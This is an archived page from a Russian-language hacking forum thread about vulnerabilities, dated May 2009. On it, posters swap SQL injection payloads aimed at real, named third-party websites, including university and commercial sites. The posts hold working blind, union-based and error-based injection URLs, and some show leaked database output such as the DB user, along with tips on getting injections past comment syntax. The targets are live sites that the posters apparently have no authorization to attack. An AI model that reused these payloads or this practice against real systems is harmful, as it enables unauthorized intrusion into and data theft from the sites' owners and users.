ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 731 из 1393 « Первая < 231631681721 727 728 729 730 731 732 733 734 735 7417818311231 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #7301  
Старый 21.05.2009, 21:54
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
А чо тут подбирать-то:

Код:
http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+order+by+1
Но видать запрос сложный, участвует ни одна таблица только, но скуля есть, хоть и блайнд:

Код:
http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+or+1=0

http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+or+1=1
4-ая ветка:

Код:
http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=13+and+substring(version(),1,1)=4
 

  #7302  
Старый 22.05.2009, 02:54
slammer
Новичок
Регистрация: 02.05.2009
Сообщений: 11
Провел на форуме:
69162

Репутация: 0
По умолчанию
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=2'

это слепая инъекция?
 

  #7303  
Старый 22.05.2009, 03:58
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969

Репутация: 169
По умолчанию
да нет, зрячая)
Код:
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(concat_ws(0x3a,user(),version())+using+latin1),4,5,6,7,8/*
 

  #7304  
Старый 22.05.2009, 17:49
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию
Код:
http://www.convex.ru/news/news-203.html?=1'
Как-нибудь можно дальше скуль раскрутить?

Ошибка в подвале страницы.
 

  #7305  
Старый 22.05.2009, 19:57
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию
Цитата:
Сообщение от InFlame  
Код:
http://www.convex.ru/news/news-203.html?=1'
Как-нибудь можно дальше скуль раскрутить?

Ошибка в подвале страницы.
Можно даже вывод сделать
Цитата:
[query: update session set value='last_url|s:51:"/news/news-203.html?=1',session_name=user(),value='";', update_date=now() where session_name='orica7dsmq18otn85ojtmvama3'
error: Duplicate entry 'convex@localhost' for key 1
in file: /home/convex/cms/inc/auto/session.inc at line: 42]
Когда идет упдейт сессии:
_http://www.convex.ru/news/news-203.html?=1',session_name=user(),value='
 

  #7306  
Старый 23.05.2009, 01:31
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию
не работают "комментарии" в MySQL
нашел сайтик там в поле логина нет проверки на '.
ну и выдает при запросе 'union select 1/*
Код:
Context info for the following error/warning:
Error: 1024, Query(r) failed:
SELECT u.email, u.userid FROM user u WHERE u.username='1' union select 1/*' AND u.email=''
With result:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' AND u.email=''' at line 4
in /local/rnsw/www/32/apache2/maoli/core/library/db.php, 381

call: DB->queryex("r", "SELECT u.email, u.userid
FROM user u
WHERE u.username='1' union select 1/*'
AND u.email=''")
и так дальше в таком же духе... не --, не # не помогает... что можно попробывать?
 

  #7307  
Старый 23.05.2009, 01:40
slammer
Новичок
Регистрация: 02.05.2009
Сообщений: 11
Провел на форуме:
69162

Репутация: 0
По умолчанию
хм.. почему когда я в конце запроса ставлю /* то работает, а если -- то нет?
 

  #7308  
Старый 23.05.2009, 01:54
slammer
Новичок
Регистрация: 02.05.2009
Сообщений: 11
Провел на форуме:
69162

Репутация: 0
По умолчанию
Цитата:
Сообщение от slammer  
хм.. почему когда я в конце запроса ставлю /* то работает, а если -- то нет?
уже разобрался надо просто --+ добавлять и тогда работает. может ктонибудь объяснит в чем принципиальная разница между /* и --+ ?
 

  #7309  
Старый 23.05.2009, 01:58
slammer
Новичок
Регистрация: 02.05.2009
Сообщений: 11
Провел на форуме:
69162

Репутация: 0
По умолчанию
http://events.wayne.edu/index.php?cat=24'+order+by+2/*
при таком запросе поидее ошибки ведь не должно быть? сколько колонок не подбирал все время таже ошибка...
 

  #7310  
Старый 23.05.2009, 01:58
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
2slammer
http://www.phpclub.ru/mysql/doc/comments.html
 
 
Страница 731 из 1393 « Первая < 231631681721 727 728 729 730 731 732 733 734 735 7417818311231 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ